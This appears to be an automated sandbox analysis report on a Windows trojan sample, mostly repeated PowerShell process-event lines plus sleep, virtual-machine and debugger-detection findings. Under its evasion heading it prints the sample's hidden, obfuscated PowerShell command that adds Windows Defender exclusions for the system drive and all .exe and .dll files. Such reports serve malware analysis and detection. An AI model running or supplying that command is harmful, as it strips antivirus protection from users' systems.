Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe TID: 7008 Thread sleep count: 56 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe TID: 7008 Thread sleep time: -56000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5016 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020 Thread sleep count: 8969 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6952 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\MonDisc.exe TID: 6536 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\MonDisc.exe TID: 6536 Thread sleep time: -35000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1572 Thread sleep count: 9360 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1668 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\MonDisc.exe TID: 5828 Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Roaming\MonDisc.exe TID: 5828 Thread sleep time: -33000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5516 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788 Thread sleep count: 7928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6680 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6191
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8969
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2381
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9360
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2973
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: powershell.exe, 0000000A.00000002.421024303.00000280F50A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: C:\Users\user\AppData\Roaming\MonDisc.exe Code function: 15_2_00007FF62C9C5754 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF62C9C5754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\MonDisc.exe System information queried: KernelDebuggerInformation
Source: C:\Users\user\AppData\Roaming\MonDisc.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\MonDisc.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\MonDisc.exe Process queried: DebugFlags
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe Process queried: DebugFlags
Source: C:\Users\user\AppData\Roaming\MonDisc.exe Code function: 22_2_00007FF62C9C5754 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FF62C9C5754

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
Source: C:\Users\user\AppData\Roaming\MonDisc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
Source: C:\Users\user\AppData\Roaming\MonDisc.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
